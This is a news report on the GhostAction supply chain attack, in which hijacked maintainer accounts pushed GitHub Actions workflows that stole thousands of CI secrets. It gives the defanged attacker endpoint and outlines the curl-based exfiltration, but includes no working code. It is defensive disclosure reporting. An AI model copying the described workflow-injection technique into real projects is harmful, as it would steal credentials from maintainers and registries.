A new supply chain attack dubbed GhostAction has rocked the open-source ecosystem by compromising 3,325 secrets across GitHub repositories. Uncovered by researchers at GitGuardian, the attack began surfacing publicly on September 2, 2025, after suspicious activity was detected in the FastUUID project. The attackers gained access to maintainer accounts and injected malicious GitHub Actions workflows, which executed automatically upon repository activity, harvesting secrets and sending them to an attacker-controlled server.
The attack wasn’t limited to FastUUID. A wider investigation revealed that at least 817 repositories were impacted, all using similarly crafted workflows to exfiltrate credentials via curl to a single endpoint: bold-dhawan[.]45-139-104-115[.]plesk[.]page. The malicious code specifically targeted secrets from GitHub Actions environments by referencing legitimate secret names used in other workflows.
GitGuardian moved quickly upon discovery. On September 5, they opened GitHub issues across 573 of the compromised repositories and directly notified security teams at GitHub, npm, and PyPI. Meanwhile, roughly 100 repositories had already detected and reverted the malicious commits independently. Shortly thereafter, the attacker’s endpoint stopped responding, likely indicating that the campaign had been shut down—or at least paused.
The scale of the breach is significant. Stolen secrets include tokens and keys from a wide range of services such as PyPI, npm, DockerHub, GitHub itself, AWS, Cloudflare, and various databases. GitGuardian warned that at least nine npm and 15 PyPI packages were affected, raising concerns about potential malicious releases until the leaked secrets are revoked.
Interestingly, the attack bears similarities to the s1ngularity campaign from late August 2025, but GitGuardian believes the two are unrelated. They also highlighted that some companies had their entire SDK stacks compromised across multiple languages, including Python, Rust, JavaScript, and Go, emphasizing the wide blast radius of this supply chain breach.
The GhostAction attack underscores the urgent need for open-source maintainers to secure GitHub workflows, rotate exposed credentials immediately, and adopt stronger account protections like MFA. For teams managing SDKs or libraries, especially those publishing to public registries, now is the time to review and harden CI/CD pipelines to prevent such automated exfiltration attacks in the future.
